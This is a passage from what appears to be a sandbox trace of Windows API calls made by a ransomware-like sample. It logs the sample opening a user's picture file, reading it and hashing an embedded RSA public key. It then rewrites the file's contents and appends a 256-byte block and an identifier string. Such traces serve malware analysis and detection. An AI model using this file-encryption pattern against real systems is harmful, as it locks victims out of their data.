ftLastAccessTime.dwLowDateTime=0x53eb0e70, ftLastAccessTime.dwHighDateTime=0x1d5e1ed, ftLastWriteTime.dwLowDateTime=0x53eb0e70, ftLastWriteTime.dwHighDateTime=0x1d5e1ed, nFileSizeHigh=0x0, nFileSizeLow=0x15071, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oo_VqMKwcxPCKD6B.gif", cAlternateFileName="OO_VQM~1.GIF")) returned 1 [0205.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670f0 | out: hHeap=0x2c0000) returned 1 [0205.494] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\oo_VqMKwcxPCKD6B.gif") returned=".gif" [0205.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\oo_VqMKwcxPCKD6B.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\oo_vqmkwcxpckd6b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.494] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=86129) returned 1 [0205.494] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.496] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1504b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.496] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.498] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.498] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x15071, lpOverlapped=0x0) returned 1 [0205.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.499] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.499] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.499] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.499] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.499] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.499] GetLastError () returned 0x0 [0205.500] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.500] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.500] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.500] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.500] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15070) returned 0x3b81690 [0205.500] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66390 [0205.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe880 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b663d8 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe898 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8c8 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe910 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8e0 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8c8 | out: hHeap=0x2c0000) returned 1 [0205.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8e0 | out: hHeap=0x2c0000) returned 1 [0205.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe910 | out: hHeap=0x2c0000) returned 1 [0205.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe910 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe8e0 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe8c8 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75968 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75a80 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8e0 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8c8 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe910 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.502] GetCurrentThreadId () returned 0x600 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69428 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.502] GetCurrentThreadId () returned 0x600 [0205.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b730a8 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe910 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8c8 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8e0 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8b0 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe928 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8f8 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe940 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8c8 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8c8 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe910 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75968 [0205.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe940 | out: hHeap=0x2c0000) returned 1 [0205.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b75b98 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75cb0 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8c8 | out: hHeap=0x2c0000) returned 1 [0205.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75cb0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8f8 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe928 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8e0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8b0 | out: hHeap=0x2c0000) returned 1 [0205.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe898 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b663d8 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b730a8 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.506] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x1506c, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x1506c, lpOverlapped=0x0) returned 1 [0205.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.506] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x15071, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.506] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.507] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) 